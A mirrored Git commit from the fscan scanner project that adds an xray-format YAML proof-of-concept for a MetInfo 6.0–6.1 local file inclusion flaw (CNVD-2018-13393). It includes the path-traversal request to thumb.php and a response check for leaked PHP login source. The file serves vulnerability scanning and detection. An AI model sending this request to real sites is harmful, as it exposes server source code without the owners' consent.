mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-27 05:31:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,12 @@
|
||||
name: poc-yaml-metinfo-lfi-cnvd-2018-13393
|
||||
rules:
|
||||
- method: GET
|
||||
path: /include/thumb.php?dir=http\..\admin\login\login_check.php
|
||||
follow_redirects: true
|
||||
expression: |
|
||||
response.body.bcontains(b"<?php") && response.body.bcontains(b"login_met_cookie($metinfo_admin_name);")
|
||||
detail:
|
||||
author: JingLing(https://hackfun.org/)
|
||||
metinfo_version: 6.0.0,6.1.0
|
||||
links:
|
||||
- https://paper.seebug.org/676/
|
||||
Reference in New Issue
Block a user